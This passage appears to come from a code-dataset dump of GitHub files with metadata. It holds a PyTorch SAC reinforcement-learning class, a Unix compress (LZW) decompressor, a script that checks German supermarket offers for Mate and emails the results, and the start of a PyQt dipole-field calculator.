= mydataset.create_dataset(args.data_dir, args.test_dir)\r\n partition = {'train': trainset, 'val': valset, 'test': testset}\r\n\r\n print('Start Training')\r\n net, setting, result = Experiment.run_experiment(partition, deepcopy(args))\r\n\r\n", "repo_name": "syed-mailab/Learning-based-attenuation-quantification-in-abdominal-ultrasound", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.mydataset.create_dataset", "line_number": 32, "usage_type": "call"}, {"api_name": "utils.mydataset", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 33, "usage_type": "attribute"}, {"api_name": "utils.mydataset.create_dataset", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.mydataset", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.Experiment.run_experiment", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.Experiment", "line_number": 38, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "17785480680", "text": "import time\nimport numpy as np\nimport copy\n\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .off_rl_algo import OffRLAlgo\n\nclass EARSAC(OffRLAlgo):\n \"\"\"\n SAC for Emergent Action Representation\n \"\"\"\n\n def __init__(\n self,\n pf_state,pf_task,pf_action,\n qf1, qf2,\n plr, qlr,\n task_nums = 1,\n optimizer_class=optim.Adam,\n\n policy_std_reg_weight=1e-3,\n policy_mean_reg_weight=1e-3,\n\n reparameterization=True,\n automatic_entropy_tuning=True,\n target_entropy=None,\n \n n_std = 0.02,\n \n **kwargs\n ):\n super(EARSAC,self).__init__(**kwargs)\n self.pf_state=pf_state\n self.pf_task=pf_task\n self.pf_action=pf_action\n self.qf1=qf1\n self.qf2=qf2\n\n self.target_qf1 = copy.deepcopy(qf1)\n self.target_qf2 = copy.deepcopy(qf2)\n\n self.to(self.device)\n\n self.plr = plr\n self.qlr = qlr\n\n self.optimizer_class = optimizer_class\n self.qf1_optimizer = optimizer_class(\n self.qf1.parameters(),\n lr=self.qlr,\n )\n\n self.qf2_optimizer = optimizer_class(\n self.qf2.parameters(),\n lr=self.qlr,\n )\n\n self.pf_optimizer = optimizer_class(\n (para for para in list(self.pf_state.parameters()) + list(self.pf_task.parameters()) + list(self.pf_action.parameters())),\n lr=self.plr\n )\n\n self.automatic_entropy_tuning = automatic_entropy_tuning\n if self.automatic_entropy_tuning:\n if target_entropy:\n self.target_entropy = target_entropy\n else:\n self.target_entropy = -np.prod(self.env.action_space.shape).item() # from rlkit\n self.log_alpha = torch.zeros(1).to(self.device)\n self.log_alpha.requires_grad_()\n self.alpha_optimizer = optimizer_class(\n [self.log_alpha],\n lr=self.plr,\n )\n self.sample_key = [\"obs\", \"next_obs\", \"acts\", \"rewards\", \"terminals\", \"task_idxs\", \"task_inputs\"]\n self.qf_criterion = nn.MSELoss()\n\n self.policy_std_reg_weight = policy_std_reg_weight\n self.policy_mean_reg_weight = policy_mean_reg_weight\n\n self.reparameterization = reparameterization\n \n self.n_std = n_std\n\n def update(self, batch):\n self.training_update_num += 1\n obs = batch['obs']\n actions = batch['acts']\n next_obs = batch['next_obs']\n rewards = batch['rewards']\n terminals = batch['terminals']\n task_inputs = batch[\"task_inputs\"]\n task_idx = batch['task_idxs']\n\n rewards = torch.Tensor(rewards).to( self.device )\n rewards_scaled = rewards * self.reward_scale\n terminals = torch.Tensor(terminals).to( self.device )\n obs = torch.Tensor(obs).to( self.device )\n actions = torch.Tensor(actions).to( self.device )\n next_obs = torch.Tensor(next_obs).to( self.device )\n task_inputs = torch.Tensor(task_inputs).to(self.device)\n task_idx = torch.Tensor(task_idx).to( self.device ).long()\n\n self.pf_state.train()\n self.pf_task.train()\n self.pf_action.train()\n self.qf1.train()\n self.qf2.train()\n\n \"\"\"\n Policy operations.\n \"\"\"\n lses = self.pf_state.forward(obs)\n ltes = self.pf_task.forward(task_inputs)\n n_mean=torch.zeros_like(ltes)\n n_std=torch.full_like(ltes, self.n_std)\n noise=torch.normal(n_mean,n_std)\n ltes_withnoise=ltes+noise\n \n ltes_withnoise=F.normalize(ltes_withnoise)\n sample_info = self.pf_action.explore(lses, ltes, return_log_probs=True )\n\n mean = sample_info[\"mean\"]\n log_std = sample_info[\"log_std\"]\n new_actions = sample_info[\"action\"]\n log_probs = sample_info[\"log_prob\"]\n\n q1_pred = self.qf1([obs, actions, task_inputs])\n q2_pred = self.qf2([obs, actions, task_inputs])\n\n if self.automatic_entropy_tuning:\n \"\"\"\n Alpha Loss\n \"\"\"\n alpha_loss = -(self.log_alpha * (log_probs + self.target_entropy).detach()).mean()\n self.alpha_optimizer.zero_grad()\n alpha_loss.backward()\n self.alpha_optimizer.step()\n alpha = self.log_alpha.exp().detach()\n else:\n alpha = 1\n alpha_loss = 0\n\n with torch.no_grad():\n lses = self.pf_state.forward(next_obs)\n\n target_sample_info = self.pf_action.explore(lses, ltes, return_log_probs=True )\n\n target_actions = target_sample_info[\"action\"]\n target_log_probs = target_sample_info[\"log_prob\"]\n\n target_q1_pred = self.target_qf1([next_obs, target_actions,task_inputs])\n target_q2_pred = self.target_qf2([next_obs, target_actions,task_inputs])\n min_target_q = torch.min(target_q1_pred, target_q2_pred)\n target_v_values = min_target_q - alpha * target_log_probs\n \"\"\"\n QF Loss\n \"\"\"\n q_target = rewards_scaled + (1. - terminals) * self.discount * target_v_values\n qf1_loss = self.qf_criterion(q1_pred, q_target.detach())\n qf2_loss = self.qf_criterion(q2_pred, q_target.detach())\n assert q1_pred.shape == q_target.shape\n assert q2_pred.shape == q_target.shape\n\n q_new_actions = torch.min(\n self.qf1([obs, new_actions,task_inputs]),\n self.qf2([obs, new_actions,task_inputs]))\n \"\"\"\n Policy Loss\n \"\"\"\n if not self.reparameterization:\n raise NotImplementedError\n else:\n assert log_probs.shape == q_new_actions.shape\n policy_loss = ( alpha * log_probs - q_new_actions).mean()\n\n std_reg_loss = self.policy_std_reg_weight * (log_std**2).mean()\n mean_reg_loss = self.policy_mean_reg_weight * (mean**2).mean()\n policy_loss += std_reg_loss + mean_reg_loss\n \n \"\"\"\n Update Networks\n \"\"\"\n self.pf_optimizer.zero_grad()\n policy_loss.backward()\n pf_state_norm = torch.nn.utils.clip_grad_norm_(self.pf_state.parameters(), 10)\n pf_task_norm = torch.nn.utils.clip_grad_norm_(self.pf_task.parameters(), 10)\n pf_action_norm = torch.nn.utils.clip_grad_norm_(self.pf_action.parameters(), 10)\n self.pf_optimizer.step()\n\n self.qf1_optimizer.zero_grad()\n qf1_loss.backward()\n qf1_norm = torch.nn.utils.clip_grad_norm_(self.qf1.parameters(), 10)\n self.qf1_optimizer.step()\n\n self.qf2_optimizer.zero_grad()\n qf2_loss.backward()\n qf2_norm = torch.nn.utils.clip_grad_norm_(self.qf2.parameters(), 10)\n self.qf2_optimizer.step()\n\n self._update_target_networks()\n\n # Information For Logger\n info = {}\n info['Reward_Mean'] = rewards.mean().item()\n\n if self.automatic_entropy_tuning:\n info[\"Alpha\"] = alpha.item()\n info[\"Alpha_loss\"] = alpha_loss.item()\n info['Training/policy_loss'] = policy_loss.item()\n info['Training/qf1_loss'] = qf1_loss.item()\n info['Training/qf2_loss'] = qf2_loss.item()\n\n info['Training/pf_state_norm'] = pf_state_norm.item()\n info['Training/pf_task_norm'] = pf_task_norm.item()\n info['Training/pf_action_norm'] = pf_action_norm.item()\n info['Training/qf1_norm'] = qf1_norm.item()\n info['Training/qf2_norm'] = qf2_norm.item()\n\n info['log_std/mean'] = log_std.mean().item()\n info['log_std/std'] = log_std.std().item()\n info['log_std/max'] = log_std.max().item()\n info['log_std/min'] = log_std.min().item()\n\n info['log_probs/mean'] = log_probs.mean().item()\n info['log_probs/std'] = log_probs.std().item()\n info['log_probs/max'] = log_probs.max().item()\n info['log_probs/min'] = log_probs.min().item()\n\n info['mean/mean'] = mean.mean().item()\n info['mean/std'] = mean.std().item()\n info['mean/max'] = mean.max().item()\n info['mean/min'] = mean.min().item()\n\n return info\n\n @property\n def networks(self):\n return [\n self.pf_state,\n self.pf_task,\n self.pf_action,\n self.qf1,\n self.qf2,\n self.target_qf1,\n self.target_qf2\n ]\n \n @property\n def snapshot_networks(self):\n return [\n [\"pf_state\", self.pf_state],\n [\"pf_task\", self.pf_task],\n [\"pf_action\", self.pf_action],\n [\"qf1\", self.qf1],\n [\"qf2\", self.qf2],\n ]\n\n @property\n def target_networks(self):\n return [\n ( self.qf1, self.target_qf1 ),\n ( self.qf2, self.target_qf2 )\n ]\n", "repo_name": "piao-0429/EAR", "sub_path": "torchrl/algo/off_policy/ear_sac.py", "file_name": "ear_sac.py", "file_ext": "py", "file_size_in_byte": 9422, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "86", "api": [{"api_name": "off_rl_algo.OffRLAlgo", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 23, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 43, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.full_like", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.normal", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 190, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 191, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 197, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "30965835080", "text": "import argparse\nimport collections.abc\nimport itertools\nimport logging\nimport os\nimport sys\nimport typing\n\nfrom ksf.unix_compress import UnixCompress\n\nlogger = logging.getLogger(__name__)\n\n\nclass UnixCompressCodeIterator(collections.abc.Iterator):\n\tbyte_iterator: typing.Iterator[int]\n\tcode_length: int\n\tcurrent_group: typing.Optional[bytes]\n\tcurrent_byte: int\n\tcurrent_bit: int\n\t\n\tdef __init__(self, bytestr: typing.Iterable[int], code_length: int) -> None:\n\t\tsuper().__init__()\n\t\t\n\t\tself.byte_iterator = iter(bytestr)\n\t\tself.code_length = code_length\n\t\tself.current_group = None\n\t\tself.current_byte = 0\n\t\tself.current_bit = 0\n\t\n\tdef __iter__(self) -> \"UnixCompressCodeIterator\":\n\t\treturn self\n\t\n\tdef _next_bit(self) -> int:\n\t\tif self.current_group is None:\n\t\t\tassert self.current_bit == 0\n\t\t\tassert self.current_byte == 0\n\t\t\t# Read code_length bytes from byte_iterator.\n\t\t\tself.current_group = bytes(itertools.islice(self.byte_iterator, self.code_length))\n\t\t\tif not self.current_group:\n\t\t\t\t# Stop once there are no more bytes.\n\t\t\t\traise StopIteration()\n\t\t\n\t\t# Extract the bit at the current position.\n\t\tbit = bool(self.current_group[self.current_byte] & 1 << self.current_bit)\n\t\t\n\t\t# Move to next bit. If necessary, also move to next byte or group.\n\t\tif self.current_bit == 7:\n\t\t\tif self.current_byte == len(self.current_group) - 1:\n\t\t\t\tself.current_group = None\n\t\t\t\tself.current_byte = 0\n\t\t\telse:\n\t\t\t\tself.current_byte += 1\n\t\t\tself.current_bit = 0\n\t\telse:\n\t\t\tself.current_bit += 1\n\t\t\n\t\treturn bit\n\t\n\tdef __next__(self) -> int:\n\t\tcode = 0\n\t\tfor i in range(self.code_length):\n\t\t\tcode |= self._next_bit() << i\n\t\treturn code\n\t\n\tdef discard_current_group(self) -> None:\n\t\tself.current_group = None\n\t\tself.current_byte = 0\n\t\tself.current_bit = 0\n\nclass UnixCompressDecompressor(collections.abc.Iterator):\n\tINITIAL_CODE_LENGTH: typing.ClassVar[int] = 9\n\tINITIAL_DECOMPRESSION_TABLE: typing.ClassVar[typing.Sequence[bytes]] = [bytes([i]) for i in range(256)]\n\t\n\tcode_iterator: UnixCompressCodeIterator\n\tblock_mode: bool\n\tmax_code_length: int\n\tlast_chunk: typing.Optional[bytes]\n\tdecompression_table: typing.List[bytes]\n\t\n\t@classmethod\n\tdef from_struct(cls, struct: UnixCompress) -> \"UnixCompressDecompressor\":\n\t\treturn cls(struct.data, struct.block_mode, struct.max_bits)\n\t\n\t@classmethod\n\tdef decompress_struct(cls, struct: UnixCompress) -> bytes:\n\t\treturn b\"\".join(cls.from_struct(struct))\n\t\n\tdef __init__(self, data: bytes, block_mode: bool, max_code_length: int) -> None:\n\t\tsuper().__init__()\n\t\t\n\t\tself.code_iterator = UnixCompressCodeIterator(data, type(self).INITIAL_CODE_LENGTH)\n\t\tself.block_mode = block_mode\n\t\tself.max_code_length = max_code_length\n\t\tself._reset_decompression_table()\n\t\n\tdef _reset_decompression_table(self) -> None:\n\t\tself.code_iterator.code_length = type(self).INITIAL_CODE_LENGTH\n\t\tself.last_chunk = None\n\t\tself.decompression_table = list(type(self).INITIAL_DECOMPRESSION_TABLE)\n\t\tif self.block_mode:\n\t\t\t# Placeholder entry for the reset code (256).\n\t\t\t# This value should never actually be used!\n\t\t\tself.decompression_table += [b\"\"]\n\t\n\tdef __iter__(self) -> \"UnixCompressDecompressor\":\n\t\treturn self\n\t\n\tdef __next__(self) -> bytes:\n\t\t# Once code_iterator is exhausted, this will raise StopIteration.\n\t\t# The exception will propagate up through __next__ and also stop this iterator.\n\t\tcode = next(self.code_iterator)\n\t\tlogger.debug(f\"Code: {code} ({code:>0{self.code_iterator.code_length}b})\")\n\t\t\n\t\tif code == 256 and self.block_mode:\n\t\t\tlogger.debug(\"-> reset decompression table\")\n\t\t\tself._reset_decompression_table()\n\t\t\tself.code_iterator.discard_current_group()\n\t\t\treturn b\"\"\n\t\telse:\n\t\t\tif code == len(self.decompression_table):\n\t\t\t\t# Special case: if code is exactly one higher than the highest currently valid code, repeat the last chunk and add its first byte once more at the end.\n\t\t\t\t# This is known as the \"KwKwK problem\", because it occurs when the uncompressed data contains a sequence of the form KwKwK (where K is a byte and w is a byte sequence and Kw is already in the compression dictionary). For a proper explanation, see https://stackoverflow.com/q/42130786.\n\t\t\t\tlogger.debug(\"KwKwK string (code is one past current end of table)\")\n\t\t\t\tassert self.last_chunk is not None\n\t\t\t\tchunk = self.last_chunk + self.last_chunk[:1]\n\t\t\telse:\n\t\t\t\tchunk = self.decompression_table[code]\n\t\t\t\n\t\t\tlogger.debug(f\"-> {chunk}\")\n\t\t\t\n\t\t\t# Create new codes only if we have a previous chunk and the maximum table size would not be reached.\n\t\t\t# (When the maximum code length is reached, the last slot in the table is never filled.)\n\t\t\tif self.last_chunk is not None and len(self.decompression_table) < (1 << self.max_code_length) - 1:\n\t\t\t\tnew_chunk = self.last_chunk + chunk[:1]\n\t\t\t\tlogger.debug(f\"New table entry: {len(self.decompression_table)} -> {new_chunk}\")\n\t\t\t\tself.decompression_table.append(new_chunk)\n\t\t\t\n\t\t\tif len(self.decompression_table) >= 1 << self.code_iterator.code_length:\n\t\t\t\t# All codes used for current code length, so increase code length by one bit.\n\t\t\t\tself.code_iterator.code_length += 1\n\t\t\t\tlogger.debug(f\"Code length increased to {self.code_iterator.code_length} bits\")\n\t\t\t\tself.code_iterator.discard_current_group()\n\t\t\t\tassert self.code_iterator.code_length <= self.max_code_length\n\t\t\t\n\t\t\tself.last_chunk = chunk\n\t\t\t\n\t\t\treturn chunk\n\n\nCOMPRESS_SUFFIX_MAP = {\n\t\".taZ\": \".tar\",\n\t\".Z\": \"\",\n}\n\ndef get_out_filename(in_filename: str) -> str:\n\tif in_filename == \"-\":\n\t\treturn \"-\"\n\telse:\n\t\tfor suffix_before, suffix_after in COMPRESS_SUFFIX_MAP.items():\n\t\t\tif in_filename.endswith(suffix_before) and in_filename != suffix_before:\n\t\t\t\tout_filename = f\"{in_filename[:-len(suffix_before)]}{suffix_after}\"\n\t\t\t\treturn \"./-\" if out_filename == \"-\" else out_filename\n\t\t\n\t\t# No matching suffix found\n\t\treturn f\"{in_filename}.uncompressed\"\n\ndef tabulate(vals):\n\t# From pfmoore on GitHub:\n\t# https://github.com/pypa/pip/issues/3651#issuecomment-216932564\n\tassert len(vals) > 0\n\t\n\tsizes = [0] * max(len(x) for x in vals)\n\tfor row in vals:\n\t\tsizes = [max(s, len(str(c))) for s, c in itertools.zip_longest(sizes, row)]\n\t\n\tresult = []\n\tfor row in vals:\n\t\tdisplay = \" \".join(\n\t\t\tstr(c).ljust(s) if c is not None else ''\n\t\t\tfor s, c in itertools.zip_longest(sizes, row)\n\t\t)\n\t\tresult.append(display)\n\t\n\treturn result, sizes\n\ndef main():\n\tap = argparse.ArgumentParser(add_help=False, allow_abbrev=False)\n\tap.add_argument(\"--help\", action=\"help\")\n\tap.add_argument(\"-l\", \"--list\", action=\"store_true\", help=\"List contents of the compressed file instead of extracting it\")\n\tap.add_argument(\"-o\", \"--output-file\", type=str, help=\"The output file name, or - for stdout (default: derived from input file name, or - if reading from stdin)\")\n\tap.add_argument(\"file\", type=str, default=\"-\", help=\"The file to decompress, or - for stdin (default: -)\")\n\t\n\targs = ap.parse_args()\n\t\n\tin_filename = args.file\n\tout_filename = args.output_file\n\t\n\tif out_filename is None:\n\t\tout_filename = get_out_filename(in_filename)\n\t\n\tif in_filename == \"-\":\n\t\tin_stream = sys.stdin.buffer\n\telse:\n\t\tin_stream = open(in_filename, \"rb\")\n\t\n\ttry:\n\t\tstruct = UnixCompress.from_io(in_stream)\n\t\t\n\t\tif args.list:\n\t\t\tprint(f\"Contents of {in_filename}:\")\n\t\t\trows, widths = tabulate([\n\t\t\t\t[\"File name\", \"Compressed size\", \"Uncompressed size\", \"Block mode?\", \"Max. code bits\"],\n\t\t\t\t[os.path.basename(out_filename), struct._io.size(), len(UnixCompressDecompressor.decompress_struct(struct)), struct.block_mode, struct.max_bits],\n\t\t\t])\n\t\t\trows.insert(1, \" \".join(\"-\"*width for width in widths))\n\t\t\tfor row in rows:\n\t\t\t\tprint(row)\n\t\telse:\n\t\t\tif out_filename == \"-\":\n\t\t\t\tout_stream = sys.stdout.buffer\n\t\t\telse:\n\t\t\t\tout_stream = open(out_filename, \"wb\")\n\t\t\t\n\t\t\ttry:\n\t\t\t\tfor part in UnixCompressDecompressor.from_struct(struct):\n\t\t\t\t\tout_stream.write(part)\n\t\t\tfinally:\n\t\t\t\tif out_filename != \"-\":\n\t\t\t\t\tout_stream.close()\n\tfinally:\n\t\tif in_filename != \"-\":\n\t\t\tin_stream.close()\n\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "dgelessus/ksf_stuff", "sub_path": "archive/unix_compress.py", "file_name": "unix_compress.py", "file_ext": "py", "file_size_in_byte": 7918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.abc.abc", "line_number": 14, "usage_type": "attribute"}, {"api_name": "collections.abc", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Iterator", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Iterable", "line_number": 21, "usage_type": "attribute"}, {"api_name": "itertools.islice", "line_number": 38, "usage_type": "call"}, {"api_name": "collections.abc.abc", "line_number": 70, "usage_type": "attribute"}, {"api_name": "collections.abc", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.ClassVar", "line_number": 71, "usage_type": "attribute"}, {"api_name": "typing.ClassVar", "line_number": 72, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 72, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 77, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 78, "usage_type": "attribute"}, {"api_name": "ksf.unix_compress.UnixCompress", "line_number": 81, "usage_type": "name"}, {"api_name": "ksf.unix_compress.UnixCompress", "line_number": 85, "usage_type": "name"}, {"api_name": "itertools.zip_longest", "line_number": 174, "usage_type": "call"}, {"api_name": "itertools.zip_longest", "line_number": 180, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 187, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 202, "usage_type": "attribute"}, {"api_name": "ksf.unix_compress.UnixCompress.from_io", "line_number": 207, "usage_type": "call"}, {"api_name": "ksf.unix_compress.UnixCompress", "line_number": 207, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path", "line_number": 213, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 220, "usage_type": "attribute"}]} +{"seq_id": "15812825728", "text": "#!/usr/bin/env python3\nimport os\nimport arrow\nimport requests\nimport json\nimport subprocess\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport smtplib\n\nheaders = {\"User-Agent\": \"Firefox auf Windows. Ganz bestimmt.\"}\n\ntmp_file_tegut = \"tegut-angebote.pdf\"\n\nusername = \"\"\npassword = \"\"\nsmtphost = \"beeftraeger.wurbz.de:465\"\nsmtpfrom = username\nsmtpto = \"\"\n\n\ndef get_tegut_angebot_url():\n now = arrow.now()\n return f\"https://static.tegut.com/fileadmin/tegut_upload/Dokumente/Aktuelle_Flugbl%C3%A4tter/tegut-prospekt-kw-{now.week:02}-2022-Hessen-Niedersachsen-Rheinland-Pfalz.pdf\"\n\n\ndef do_tegut():\n print(\"Checking Tegut Angeote\")\n resp = requests.get(get_tegut_angebot_url(), headers=headers)\n assert resp.status_code == 200\n with open(tmp_file_tegut, \"wb\") as f:\n f.write(resp.content)\n print(f\"Downloaded Tegut Angebote to {tmp_file_tegut}\")\n p = subprocess.Popen([\"pdfgrep\", \"-i\", \"mate\", tmp_file_tegut], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.wait()\n assert p.returncode == 0\n stdout, stderr = p.communicate()\n os.remove(tmp_file_tegut)\n print(stdout.decode())\n return stdout.decode()\n\n\ndef do_rewe():\n \"\"\"\n 240817: REWE Südmarkt GmbH Mitte, Leydhecker Str. 16 None, 64293 Darmstadt\n 241176: REWE Michael Weisbrod oHG, Pallaswiesenstr. 70-72 None, 64293 Darmstadt\n 240660: REWE Markt GmbH, Europaplatz 2 None, 64293 Darmstadt\n 240573: REWE Markt GmbH, Berliner Allee 59 None, 64295 Darmstadt\n 862193: REWE Regiemarkt GmbH, Gutenbergstraße 3-15 / Loop5 None, 64331 Weiterstadt / Riedbahn\n 240270: REWE Markt GmbH, Liebfrauenstr. 34 None, 64289 Darmstadt\n 240164: REWE Markt GmbH, Luisencenter 5 None, 64283 Darmstadt\n 240657: REWE Markt GmbH, Dieburger Str. 24 None, 64287 Darmstadt\n 240070: REWE Markt GmbH, Heinrichstr. 52 None, 64283 Darmstadt\n 240269: REWE Markt GmbH, Schwarzer Weg 9 None, 64287 Darmstadt\n 240225: REWE Markt GmbH, Rüdesheimer Str. 119-123 None, 64285 Darmstadt\n 240801: REWE Markt GmbH, Flughafenstr. 7 None, 64347 Griesheim Darmstadt\n 240795: REWE Markt GmbH, Schneppenhaeuser Str. 21 None, 64331 Weiterstadt / Gräfenhausen\n 240277: REWE Michael Weisbrod oHG, Oberndorfer Straße 111 None, 64347 Griesheim\n 240340: REWE Markt GmbH, Südliche Ringstr. 27 None, 64390 Erzhausen\n 240126: REWE Markt GmbH, Heidelberger Landstr. 236-240 None, 64297 Darmstadt/Eberstadt\n 240166: REWE Markt GmbH, Rheinstr. 47 None, 64367 Mühltal / Nieder-Ramstadt\n 240276: REWE Markt GmbH, Eberstädter Str. 94 None, 64319 Pfungstadt\n \"\"\"\n print(\"Checking REWE Angebote\")\n market_id = 240070\n resp = requests.get(f\"https://mobile-api.rewe.de/products/offer-search?categoryId=&marketId={market_id}\", headers=headers)\n assert resp.status_code == 200\n j = resp.json()\n results_rewe = list()\n for item in j['items']:\n #print(item['name'])\n if \"mate\" in item['name'].lower():\n #print(f\"REWE HIT\\n{json.dumps(item, indent=4)}\")\n results_rewe.append(item)\n return results_rewe\n\n\ndef send_mail(message):\n # credit: https://www.authsmtp.com/python/index.html\n\n msg = MIMEMultipart()\n msg['From'] = smtpfrom\n msg['To'] = smtpto\n msg['Subject'] = \"Gibt's mal wieder Mate?\"\n msg.attach(MIMEText(message, 'plain'))\n\n server = smtplib.SMTP_SSL(smtphost)\n server.login(username, password)\n server.sendmail(msg['From'], msg['To'], msg.as_string())\n server.quit()\n print(\"Sent mail\")\n\n\nif __name__ == '__main__':\n\n output = f\"## Mate Checker Results {arrow.now().format()} ##\\n\\n\"\n output += \"###### BEGIN Tegut ######\\n\"\n output += f\"Angebote der Woche: {get_tegut_angebot_url()}\\n\\n\"\n output += do_tegut()\n output += \"###### END Tegut ######\\n\\n\\n\"\n output += \"###### BEGIN Rewe ######\\n\"\n rewe_list = do_rewe()\n for item in rewe_list:\n item_text = f\"{item['name']} {item['price']} {item['_links']['image:m']['href']}\\n\"\n output += item_text\n output += \"###### END Rewe ######\"\n\n print(output)\n send_mail(output)\n", "repo_name": "kmille/Ist-die-Mate-im-Angebot", "sub_path": "mate-check.py", "file_name": "mate-check.py", "file_ext": "py", "file_size_in_byte": 4180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "arrow.now", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 35, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 67, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 82, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 86, "usage_type": "call"}, {"api_name": "smtplib.SMTP_SSL", "line_number": 88, "usage_type": "call"}, {"api_name": "arrow.now", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "46126021412", "text": "from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QPushButton, QVBoxLayout, QLabel, QDialog, QMessageBox\nfrom PyQt5 import QtGui\nimport sys\nimport mpmath as mp\nfrom EFP_Calculator_GUI import *\nfrom EF_of_dipole import *\nfrom copy import deepcopy\n\nmp.dps = 100\nclass myForm(QMainWindow):\n '''\n Purpose: Main GUI class to handle all the GUI operations and invoking different functions to calculate results\n '''\n def __init__(self):\n super().__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.ui.textBrowser.setOpenExternalLinks(True)\n self.ui.textBrowser_2.setOpenExternalLinks(True)\n self.ui.mdiArea.addSubWindow(self.ui.subwindow)\n self.ui.mdiArea.addSubWindow(self.ui.help_subwindow)\n self.ui.mdiArea.addSubWindow(self.ui.about_subwindow)\n self.ui.calculate_pushButton.clicked.connect(self.cal_result)\n self.show()\n\n\n def mistakes_disp(self, errors:list):\n '''\n Purpose: to display a popup message with list of all the invalid values\n '''\n # First line of error message\n message = 'Invalid Input received for the following attribute(s) :\\n'\n\n # Editing Message as per the errors\n for i, error in enumerate(errors):\n message += str(i+1) + ' : ' + error + '\\n'\n\n # Displaying error message\n response = QMessageBox.question(self, 'Errors!', message, QMessageBox.Ok )\n\n # Closing Message Box\n if response == QMessageBox.Yes:\n sys.exit()\n\n\n def results_disp(self):\n '''\n Purpose: To calculate and results and display results\n\n Variables Used:\n 1. DM = to store the value of dipole moment\n 2. Exact_Potential = to store the exact potential calculated\n 3. Approx_Potential = to store the value of approx potential calculated\n 4. Error = to store the error i.e difference of exact potential and approx potential\n '''\n\n DM = dipole_moment(self.charge, self.a)\n self.ui.DM_lineEdit.setText(str(DM))\n\n Exact_Potential = dipole(self.r, self.angle, self.charge, self.a)\n 